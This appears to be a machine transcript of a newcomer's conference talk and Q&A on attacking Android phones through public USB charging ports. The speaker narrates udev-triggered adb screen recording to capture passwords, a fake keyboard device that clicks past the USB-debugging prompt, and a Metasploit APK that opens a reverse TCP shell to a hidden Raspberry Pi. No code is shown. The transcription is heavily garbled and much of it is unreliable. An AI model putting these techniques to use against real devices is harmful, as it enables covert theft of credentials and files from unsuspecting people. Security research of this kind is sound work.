A Newbie's Talk On Mobile Dangers Through The Looking Glass

hi everyone welcome to my talk oh yeah and leave his tape on mobile dangerous for the looking girl so just a bit of a mouthful to say I must have met um a little bit of background about how this talk came about I went to security a few months ago with a colleague and I met I bumped into Andy and David you start talking about b-sides and possibly doing a talk and I said to them I want to do a talk after my dissertation but after a few beers they did persuade me to do this talk now so anyway I helped me out but this so quick run through what my talks and if you bow these are a

few points that I've expanded on a little bit it's quite steep learning curve because I didn't really have a talk before so I wanted to go except it's like working on it quite a lot and I will speak learning curve for this but first thing I wanted to look at was why do people actually read their devices and I quite a lot positives initially I thought was a bad thing I thought people like if you've rooted your device you're opening yourself up to a lot of vulnerabilities but actually you can them you can definitely make your hats later so you you can increase the privacy you can get liberate of a lot of the bloatware on your device and you can

install cool themes and third-party apps if you want to do that I mean how many of you in the audience has an Android device cool how many of you have rooted your Android device so a lot of you probably knew what you were doing when you're rooting your device especially here but some people they don't necessarily know what they're doing and they could be speedy installing custom themes and new roms and you can't be cool things that but you could also open up your talk to possibly you could probably thought you could possibly break your device which I did experience first time when I was testing things and also you can see that some of the apps

won't work because in case you install a third-party app it could be a bower and you could open your your device up turn more cool so first I looked at how you actually real device so there are two ways I found so far there were ones immanuel immanuel way and then I saw that you can install apps when you were rooting your device so when I went to root my device the device I had a samsung Jeffrey that really rubbish that want to do it on my iPhone I tried to install Kingo root and one click and one click root the one think great you had to pay for the Kingo root it didn't actually work on my device and I wanted

to see how you'd be able to read a device manually anyway so I give a try and I installed 12 recovery image so when i went to root it I went into fastboot mode and it still installed the recovery image and then I ended up going through and they're installing the binary so I you super see although my disc is more of a newer version that people use and when it's a recovery mode and still that binary and basically installing the superuser binary can then enable you to go out for religious tea applications and you could do cool things like customize your firmware on your device or anything like that I thought was really interesting actually

before I did the talk I thought up it could be it could be a danger obviously and I've changed my mind a lot on the site if you know what you're doing you could do some really cool things you can improve the battery life of your device and things that Seth had enough it's that firstly first I set up my lab really could be around theory it's not enough install I didn't really notice tearing I had a PI pi 0 which had terrible processing power so I came to a PI 3 B+ and worked a lot better just a quick setup I mean I had a Peyser had one us people and I was lugging my mouse

taking out plug in my keyboard taking it out and I plugged my phone it was like I can't actually run any commands on my phone because for my phone and connector because she didn't have enough people so I had a USB port splitter and got that and the whole idea behind this talk was the fact that I've been seeing a lot of these USB ports around charging USB ports on my plays and buses and whatnot and I think this is a possible attack vector here because if you plug your device into this random USB port you don't necessarily know what's going to happen so the whole idea behind this was programmatically rooting your device and

I did feel a lot like this when I started looking into it because there's a lot of there's a lot of reasons why you can't and security is actually quite high on your devices so for example when you plug your device in it's the USB does USB debugging after that pop up on the screen that comes up you have to physically real device as well press buttons and manual questions and whatnot and yeah human human input is needed so you do have a pop oh you have to press okay and whatnot that's our that's that's an issue so I've decided to try and find ideas to work around that but first I want to see what you could do

when you plug your device into it u.s. people when it's not rooted some issue say there's a quick disclaimer here is that if you plug your device into a USB for charging port if a PI was behind this thought then what could happen and I played around with you dev rules to interrupt and kernel detect when a device is plugged in I've create a shell script to kick off screen recording which is quite cool thing so if you do adb shell you can scream and call your device was quite a few ifs and buts they would the code that I wrote here you can see the vendor ID text the device and keeps off the PI script you have to have

a specific vendor ID for it to kick off in the background and always it's very simple code and there's a lot I want to develop on it from this but basically of course screen and you can capture it so it maximum is about three minutes but you could possibly capture passwords and you can see that's showing up there and you could also see emails or sensitive documents and I thought I was quite interesting but I little that idea that if you did plug that device and you don't know what's happening because the user doesn't see it necessarily you have to make sure that the device is unlocked and the USB debugging enabled first actually watch well one of the issues

because the USB debugging pop-up came up I was thinking what's a good way to work around that so I had to play around with a business card device and I went through about five of them because of all them broke but you can automate the keyboard on the battle pretend like it's a human interface device and automate some of the steps so here I've just got gif of the code working now on the side and you can see it's switching and pressing ok and if this develops a little bit further you'd be able to kind of cancel out the pop out because imagine if you plug the device into this USB port this runs and

it's just sending the codes and you can automate a lot of this alright and the pie could be something for and you could also you could also crack passwords they take a really long time I didn't really try it was something I'd like to develop so initially I had a look at third epps as well because i was one of the issues behind it and there was one called a fake snap to act i looked into you and if you were someone like a grand mal for example they had a fun and they installed a this app this app could possibly with the permissions go back network and also steal the credentials and it used to be in the Google Play

Store it's taken down now but it's so easy cuz this is the newbies talk you could just download the apk file and you could install it under file to listen like so being a newbie that I am I decided to try and create an apk file using easy split which is basically pass the NSF console and asteroid and I had a look at trying to install that onto my device so I used the ADB Android debugging bridge to automate the install on the back of the with my PI and you plug it in and when I when I plugged it in I actually lost the apk file I don't know how and I checked it I tried to

understand it what an uninstall try to install it was saying it was already installed so if I know what happened there but that was were the things I think if you manage to install it and kick it off then it would run in the background and you'd be able to exploit it in prerov as TCP connection with the payload so if you imagine you've plugged your device in and you can install the apk file and they might click on it through some social engineering or possibly and attend I saw I had little million zillion tech st. fully understand but these can kick off in the background if you run the ABB shell come on if you automated that for a basket when

it's plugged in and you develop real kicked off that you'd be able to create this reverse TCP capture TCP connection to the PI and then from that SSH so he could be like hacker in a cafe or something SSH into the PI that's hidden disguised and then you'd be able to access all these files on this rooted device for example that has been plugged in and then would really be none the wiser otherwise you'd have to make sure that you've unlocked the device again and got rid of all the popups so because the install the apk file didn't fully work out to ours like well how it was this apk file actually doing in the

background so I used apktool just to pull out some of the files of the a PK that had been generating them SF consoles so I wanted to see how it was working and basically had all these permissions and it's someone installed this apk files like clicking yes and granted all these permissions you basically had a bug on your class this is really interesting has something I really want to look into as well so there's a lot of ideas because I really wanted to do some I just yeah so you've got all these machines and I also had to play around with the smiley files and this tool called x2 just so I had a look

in that R and X teacher and I opened up some the Smarty file so I could read them in Java they're too far that definitely will have a future a few quick mentions but I wanted to say with there's a lot of cool things already out there in terms of just storing a device I guess so you've got the USB killer this short circuit said itself uses your phone and kills it completely so imagine if you're a businessman or whatever a new plug your device into this u.s. people and it kills your phone that's basically basically your life as a lot of people have phones these days and it's Freder as well I'm pretty sure there was a talk

on that earlier and if you've rooted your data device for example and you've installed Freder and you've used it to pretend that you're not rude then you can install third-party malicious app and that will get all the accesses lara break out the sandbox environment and cause bit damage so freely could be a nice eye patches are quite interesting but a lot too much depending on time yeah so I wanted to mention iOS because I didn't play around with it's a bit of a gray area because it's close sauce I didn't look into the vulnerabilities of it however there's a exploit database for this you can find online I've got I'm pretty sure there's a link in my

description you can come and talk about you would yeah it's not just Android devices that are vulnerable and part of the futures I do want to look into this a bit further and I'd lovely like a 2.90 of something where I've actually like research into a lot because I didn't have too much time to research into this one so I'm interested in mobile malware are we searching to that and I love the automation size behind it so the whole idea of this was automating the exploits when you plug your device into the PI so I'd like to work oh yeah that's pretty much a joke so if you have any questions because it might not been so cool

a little bit I'm supporting out there please ask away because I could probably explain better in a conversation muscle the guy all the way in the back yeah use the microphone probably creating the dizzy squat device I said it looks at such a small slide but I spent days just trying to get this automation to work alright plug this keyboard into my phone as five pressing the keys I thought I tried all to make these steps actually the best because you can see it working as soon as you plugged it in and it's so satisfiying on you actually managed to get that working and I'd love to develop it so you could create bad USB with

these cities box just plug it in and imagine what you could do with your phone then yeah that's probably one of the most other questions remember the old days when ADB was the assembler debugger geez I'm sorry comments thoughts it's not a question is this hand I swear he did do you have any boss security I'd love to hear your thoughts on this because as you can see it's a very like a lot of ideas and I've still a long way to go with this I please just like comment approached me because I'm really open to learning more about it so the USB device he showed up there the little thing was that actually like a

rubber ducky or something equivalent so I got these did you spot devices they're like not cough Arduinos I bought a load of them and I love them just didn't work because I just clearly not sure exactly so I got the idea of a bad yet I had the idea about USB I don't want to try and create something enough paramount code initially because I've got to experience this I wanted to pull files off the device and then move them onto us piece it wasn't really close or I haven't managed to get working but I did just end up using it to send commands to the phone and it literally works straight away Gabe hiding in the back I need for

another 10,000 steps today just welcome down the plane when you fly home talking about the requirement to have the device ID did you do anything with it attempting to automatically identify the device to grab the device I'd even say a database or something is that something you've looked at as possible no I didn't it could definitely be possible in my head I thought if it was actually going to become a working so it doesn't take the work that's when I was testing that it's obviously my practice having a load of you dev rules but I initially looked I spent a lot of time looking at gvfs and the where it was mounted and seeing if I

could alter anything like that so when it's plugged in if it detects a device like that I did ibly I could definitely look them to work I was thinking a lot of vendor IDs but it's hard but it's very specific to one device whereas there are different types of devices out there and there's different ways of routing the devices and it's it's very varied so yeah be something I'd want to look into sure yeah okay the universe the interactive the couzo the kernel and so much sound for a thermostat godlessness interprets it it detected again oh so basically with the you Devils it like it has common but it's not it's not really a listener yes it's

a mere listener and it talks to the turn on the kernel does that send the Kamaria but yeah it's the device that way so when I was testing it I run LS USB to find out what the vendor ID was in the product ID and then wiped it that way and originally I was thinking you'd have to use the vendor ID in the product ID in the rules file so we had to kick anything off but actually could limit it to the vendor ID and when I was - it was getting when I was testing it I will you because you had to have it unlocked and then also USB debugging they would I was testing it and I

managed to get it to kick off the shell script to bring up a browser so I knew it was working how does she do it say yeah Cecily I do have that probably such a little better excellent thank you very much